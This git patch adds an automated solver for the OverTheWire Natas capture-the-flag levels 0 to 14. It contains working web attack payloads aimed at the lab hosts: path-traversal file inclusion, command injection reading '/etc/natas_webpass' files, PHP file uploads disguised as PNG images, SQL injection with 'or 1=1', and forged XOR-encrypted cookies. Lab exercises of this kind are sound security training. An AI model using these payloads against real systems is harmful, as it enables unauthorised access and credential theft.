From ed8bf400d1c9a95e7f3b7ede96fdcaed6971fd6d Mon Sep 17 00:00:00 2001
From: Michael Zhang <mail@mzhang.io>
Date: Thu, 5 Oct 2023 00:39:07 -0500
Subject: [PATCH] initial

---
 .gitignore    |   2 +
 bun.lockb     | Bin 0 -> 1280 bytes
 index.ts      |  55 +++++++++++++
 package.json  |   5 ++
 solve.ts      | 209 ++++++++++++++++++++++++++++++++++++++++++++++++++
 tsconfig.json |   5 ++
 util.ts       |  76 ++++++++++++++++++
 7 files changed, 352 insertions(+)
 create mode 100644 .gitignore
 create mode 100755 bun.lockb
 create mode 100644 index.ts
 create mode 100644 package.json
 create mode 100644 solve.ts
 create mode 100644 tsconfig.json
 create mode 100644 util.ts

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..c449ca2
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+node_modules
+passwords.json
\ No newline at end of file
diff --git a/bun.lockb b/bun.lockb
new file mode 100755
index 0000000000000000000000000000000000000000..96a18528dc69c75035832e86e2a8ba7852c8c6b2
GIT binary patch
literal 1280
zcmY#Z)GsYA(of3F(@)JSQ%EY!;{sycoc!eMw9K4T-L(9o+{6;yG6OCq1_lPZw2)n;
zTc6Hzu!+7>VPH3JyMkbSv0G5D{~OUSQ{I?b6|evm0Rc!Y2yj3sINbo{SHToO`4Ebe
zfdQs~q54hw*$$!CN{mnyvQS!pQDB!IGXujaD1Ztx{N;Pix{aBQp<(*^e3%}P9Lyql
zAUhCfK1>ekPzIo#3}QfW&*E(hwr_l857L7UKzd;MKys-3fBgTDCDApL$!BDMn2T&Q
z%j64}B>vmYm~v9K|Ib_A-c>qru`(u)GB{*RI=b_n|L*YHz42A*=B?A;+5BBG=~Kp(
zWp=e`OrcFv7XA2BeqWhM71=EU5RQImaVm%f3eyeKAYq4WC$biNY|`}{fJV&~D9vS4
zT$HSrnO9trn3JOiOMrSIMX9NF3PuJB#hF#9`Dr=|CJKo;ndy1?X<RV({QD09AU@a~
zK)-+h3zX)vDK$2-18T%!gaK5Y2@&c+=4U|FHNn+K8=1wHS^%AC2Dify!<nG8)&NV_
z9I%ARa0Y4$j7ANI;?&%-)FM6Cijvf#yu_T~lA_GKbUOt@ghdu`i+(^&%77+rpud4`
zGQ{d6P$n;_EJ!U*PRvUzs?;+wFfukYFfa)*G%+wVHq0m~DJZtm*Dp#<&nzwh%I6j2
jW)<t@7p3dNb?WOP*t&*#26`sC*bUPwNv{G&$RH#D6i?e&

literal 0
HcmV?d00001

diff --git a/index.ts b/index.ts
new file mode 100644
index 0000000..580c7c9
--- /dev/null
+++ b/index.ts
@@ -0,0 +1,55 @@
+import solve from "./solve";
+import { getPasswordFor, savePassword } from "./util";
+
+async function main() {
+  let prevPassword = "natas0";
+
+  for (let i = 0; ; i++) {
+    console.log(`Solving level ${i}`);
+
+    const savedPassword = await getPasswordFor(i);
+    if (savedPassword) {
+      console.log("saved");
+      prevPassword = savedPassword;
+      continue;
+    }
+
+    const user = `natas${i}`;
+    const fetchReplacement = async (url: string, init?: RequestInit) => {
+      const newUrl = new URL(
+        url,
+        `http://natas${i}.natas.labs.overthewire.org/`
+      );
+      const headers = new Headers(init?.headers);
+
+      const authorization = btoa(`${user}:${prevPassword}`);
+      headers.set("Authorization", `Basic ${authorization}`);
+      const newInit = { ...init, headers };
+      console.log(newUrl, user, prevPassword, newInit);
+      return await fetch(newUrl, newInit);
+    };
+
+    const solveFn = solve[i];
+
+    if (!solveFn) throw new Error(`No solution for natas${i} yet.`);
+
+    try {
+      const password = await solveFn({
+        username: user,
+        prevPassword,
+        fetch: fetchReplacement,
+      });
+
+      if (typeof password !== "string") throw new Error("non-string output");
+
+      prevPassword = password;
+      savePassword(i, password);
+    } catch (e) {
+      console.log("sad");
+      console.trace(e);
+      break;
+    }
+  }
+}
+
+main();
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..f099686
--- /dev/null
+++ b/package.json
@@ -0,0 +1,5 @@
+{
+  "devDependencies": {
+    "bun-types": "^1.0.4-canary.20231004T140131"
+  }
+}
diff --git a/solve.ts b/solve.ts
new file mode 100644
index 0000000..5be2a0d
--- /dev/null
+++ b/solve.ts
@@ -0,0 +1,209 @@
+import { bytes2str, determinePeriod, hex2bin, xor } from "./util";
+
+const solves: SolveFn[] = [
+  async ({ fetch }) => {
+    const result = await fetch("/");
+    const text = await result.text();
+    const match = text.match(/The password for natas1 is ([^ ]+)/);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/");
+    const text = await result.text();
+    const match = text.match(/The password for natas2 is ([^ ]+)/);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/files/users.txt");
+    const text = await result.text();
+    const match = text.match(/^natas3:([^\s]+)$/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    // Discover this URL through /robots.txt
+    const result = await fetch("/s3cr3t/users.txt");
+    const text = await result.text();
+    const match = text.match(/^natas4:([^\s]+)$/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/", {
+      headers: { Referer: "http://natas5.natas.labs.overthewire.org/" },
+    });
+    const text = await result.text();
+    const match = text.match(/The password for natas5 is ([^\s]+)/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/", {
+      headers: { cookie: "loggedin=1" },
+    });
+    const text = await result.text();
+    const match = text.match(/The password for natas6 is ([a-zA-Z0-9]+)/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/includes/secret.inc");
+    const text = await result.text();
+    const secret = text.match(/\$secret = "([^"]+)"/);
+
+    const params = new URLSearchParams([
+      ["secret", secret[1]],
+      ["submit", "Submit+Query"],
+    ]);
+    const result2 = await fetch("/", {
+      method: "POST",
+      headers: { "Content-Type": "application/x-www-form-urlencoded" },
+      body: params.toString(),
+    });
+    const text2 = await result2.text();
+
+    const match = text2.match(/The password for natas7 is ([a-zA-Z0-9]+)/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    // Local file inclusion
+    const result = await fetch(
+      "/index.php?page=../../../../../etc/natas_webpass/natas8"
+    );
+    const text = await result.text();
+    const match = text.match(/<br>\s+([a-zA-Z0-9]+)\s+<!--/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const encodedSecret = "3d3d516343746d4d6d6c315669563362";
+    let secret: any = hex2bin(encodedSecret);
+    secret.reverse();
+    secret = bytes2str(secret);
+    secret = atob(secret);
+
+    const params = new URLSearchParams([
+      ["secret", secret],
+      ["submit", "Submit+Query"],
+    ]);
+    const result = await fetch("/", {
+      method: "POST",
+      headers: { "Content-Type": "application/x-www-form-urlencoded" },
+      body: params.toString(),
+    });
+    const text = await result.text();
+    const match = text.match(/The password for natas9 is ([a-zA-Z0-9]+)/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch(
+      "/?needle=%3B+cat+%2Fetc%2Fnatas_webpass%2Fnatas10+%23&submit=Search"
+    );
+    const text = await result.text();
+    const match = text.match(/<pre>\s*([a-zA-Z0-9]+)\s*<\/pre>/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch(
+      "/?needle=%22%22+%2Fetc%2Fnatas_webpass%2Fnatas11+%23&submit=Search"
+    );
+    const text = await result.text();
+    const match = text.match(/<pre>\s*([a-zA-Z0-9]+)\s*<\/pre>/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const result = await fetch("/");
+    const originalCiphertext = atob(
+      decodeURIComponent(result.headers.get("set-cookie").split("=")[1])
+    );
+    const originalPlaintext = `{"showpassword":"no","bgcolor":"#ffffff"}`;
+    const fullKey = xor(originalCiphertext, originalPlaintext);
+    const key = fullKey.slice(0, determinePeriod(fullKey));
+
+    const data = { showpassword: "yes", bgcolor: "#ffffff" };
+    const encrypted = encodeURIComponent(
+      btoa(bytes2str(xor(JSON.stringify(data), key)))
+    );
+
+    const result2 = await fetch("/", {
+      headers: { cookie: `data=${encrypted}` },
+    });
+    const text = await result2.text();
+    const match = text.match(/The password for natas12 is ([a-zA-Z0-9]+)/m);
+    return match[1];
+  },
+
+  async ({ fetch }) => {
+    const data = new FormData();
+    data.append("filename", "index.php");
+    const payload = `<?php echo file_get_contents("/etc/natas_webpass/natas13"); ?>`;
+    data.append("uploadedfile", new Blob([payload]), "index.php");
+    const uploadResult = await fetch("/", {
+      method: "POST",
+      body: data,
+    });
+
+    const text = await uploadResult.text();
+    const urlMatch = text.match(/The file <a href="([^"]+)">/);
+    const url = urlMatch[1];
+
+    const fileResult = await fetch(url);
+    return (await fileResult.text()).trim();
+  },
+
+  async ({ fetch }) => {
+    const data = new FormData();
+    data.append("filename", "index.php");
+    // From http://www.libpng.org/pub/png/spec/1.2/PNG-Structure.html
+    const header = new Uint8Array([137, 80, 78, 71, 13, 10, 26, 10]);
+    const payload = `(<?php echo file_get_contents("/etc/natas_webpass/natas14"); ?>)`;
+    data.append("uploadedfile", new Blob([header, payload]), "index.png");
+    const uploadResult = await fetch("/", {
+      method: "POST",
+      body: data,
+    });
+
+    const text = await uploadResult.text();
+    console.log("result!", text);
+    const urlMatch = text.match(/The file <a href="([^"]+)">/);
+    const url = urlMatch[1];
+
+    const fileResult = await fetch(url);
+    const text2 = await fileResult.text();
+    const match = text2.match(/\(([^\)]+)\)/);
+    return match[1].trim();
+  },
+
+  async ({ fetch }) => {
+    const params = new URLSearchParams([
+      ["username", `" or 1=1 or "`],
+      ["password", ""],
+    ]);
+    const result = await fetch("/", {
+      method: "POST",
+      headers: { "Content-Type": "application/x-www-form-urlencoded" },
+      body: params.toString(),
+    });
+    const text = await result.text();
+    const match = text.match(/The password for natas15 is ([a-zA-Z0-9]+)/m);
+    return match[1];
+  },
+];
+
+export default solves;
+
+interface SolveFn {
+  (props: SolveFnProps): string | Promise<string>;
+}
+
+interface SolveFnProps {
+  username: string;
+  prevPassword: string;
+  fetch: (url: string, init?: RequestInit) => Promise<Response>;
+}
diff --git a/tsconfig.json b/tsconfig.json
new file mode 100644
index 0000000..b4ecf7e
--- /dev/null
+++ b/tsconfig.json
@@ -0,0 +1,5 @@
+{
+  "compilerOptions": {
+    "types": ["bun-types"]
+  }
+}
diff --git a/util.ts b/util.ts
new file mode 100644
index 0000000..f91df46
--- /dev/null
+++ b/util.ts
@@ -0,0 +1,76 @@
+import { createWriteStream } from "node:fs";
+
+const fileName = "./passwords.json";
+
+export async function getPasswordFor(level: number): Promise<string | null> {
+  try {
+    const file = Bun.file(fileName);
+    const data = await file.json();
+    return data[`natas${level}`];
+  } catch (e) {
+    return null;
+  }
+}
+
+export async function savePassword(
+  level: number,
+  password: string
+): Promise<void> {
+  let data = {};
+
+  try {
+    const file = Bun.file(fileName);
+    data = await file.json();
+  } catch (e) {}
+
+  data[`natas${level}`] = password;
+  createWriteStream(fileName).end();
+  await Bun.write(fileName, JSON.stringify(data, null, 2));
+}
+
+export function hex2bin(hex: string): number[] {
+  const buf = [];
+  for (let i = 0; i < hex.length; i += 2) {
+    const byte = hex.slice(i, i + 2);
+    buf.push(parseInt(byte, 16));
+  }
+  return buf;
+}
+
+export function bytes2str(bytes: number[]): string {
+  return bytes.map((c) => String.fromCharCode(c)).join("");
+}
+
+export function xor(str: string, key: string | number[]): number[] {
+  const result = [];
+  str.split("").forEach((c, idx) => {
+    const pIdx = idx % key.length;
+    let c2;
+    if (typeof key === "string") c2 = key.charCodeAt(pIdx);
+    else c2 = key[pIdx];
+    result.push(c.charCodeAt(0) ^ c2);
+  });
+  return result;
+}
+
+export function determinePeriod(
+  arr: number[],
+  threshold: number = 1,
+  limit: number = 50
+): number {
+  let period = 1;
+  let lowest = null;
+  while (period < limit) {
+    let sum = 0;
+    for (let i = period; i < arr.length; i++) {
+      sum += arr[i] ^ arr[i - period];
+    }
+    console.log(period, sum);
+
+    if (sum === 0) return period;
+    if (lowest === null || sum < lowest[0]) lowest = [sum, period];
+    period += 1;
+  }
+
+  if (lowest <= threshold) return lowest[1];
+}